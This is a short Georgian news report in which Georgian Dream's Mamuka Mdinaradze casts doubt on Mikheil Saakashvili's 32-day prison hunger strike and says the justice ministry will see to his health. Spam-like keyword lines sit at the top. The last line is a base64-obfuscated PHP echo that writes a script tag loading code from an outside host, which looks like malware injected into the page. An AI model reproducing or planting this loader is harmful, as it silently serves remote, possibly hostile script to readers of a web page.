celsiusi
ავერსი საქკაბელი
„ქართული ოცნების“ ერთ-ერთი ლიდერი, მამუკა მდინარაძე ამბობს, რომ მიხეილ სააკაშვილის ჯანმრთელობის მდგომარეობას, ისევე როგორც ყველა სხვა პატიმარს – იუსტიციის სამინისტრო მიხედავს.
 
ჟურნალისტებთან საუბარში მდინარაძე ამბობს, რომ ქართული სახელმწიფო ნებისმიერ პატიმარზე იღებს პასუხისმგებლობას – „რაც კი სახელმწიფოს შესაძლებლობის ფარგლებში არის“.
 
რაც შეეხება სააკაშვილის ჯანმრთელობის მდგომარეობას, ის დასძენს, რომ სამინისტრო საჭიროებისამებრ იმოქმედებს. თუმცა, დეტალებზე – მათ შორის, რომელ საავადმყოფოში გადაიყვანენ სააკაშვილს – არ საუბრობს.
 
„მოდი, თავისი პერსონალური მონაცემების გახმოვანების საშუალება მისცეს პენიტენციურ სამსახურს, იუსტიციის სამინისტროს, მერე ვნახოთ, შემთხვევით ფეიკი ხომ არ არის ეს შიმშილობა, ან ნახევრად შიმშილობა ხომ არ არის და ა.შ. გარკვეული ეჭვები არსებობს. მოდი, ამაზე ვილაპარაკოთ“, – აცხადებს მდინარაძე.
 
ჟურნალისტის დამატებით კითხვაზე, უშუალოდ მას აქვს თუ არა ეჭვები შიმშილობაზე, ის პასუხობს:
 
„ასე გაგვიგია ყველას, რომ 40 დღე ძლებს ადამიანი და 41-ე დღეს ველოდებით და ჯანსაღად იქნება ეს ადამიანი, დარწმუნებული ვარ. მერე სალაპარაკო აღარ გვექნება მე და თქვენ და რამდენიმე ტელევიზიას.“
 
მიხეილ სააკაშვილი 32-ე დღეა, რაც შიმშილობს. მისი თანაპარტიელები და მკურნალი ექიმები ამბობენ, რომ მდგომარეობა მძიმდება.
 
მხარდამჭერთა და პარტიის წევრთა ნაწილი სააკაშვილს მოუწოდებს, შიმშილობა შეწყვიტოს, რათა მისი მდგომარეობა კიდევ უფრო არ დამძიმდეს. მათ შორის არის პარტიის თავმჯდომარე და თბილისის მერობის კანდიდატი ნიკა მელიაც.
972
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");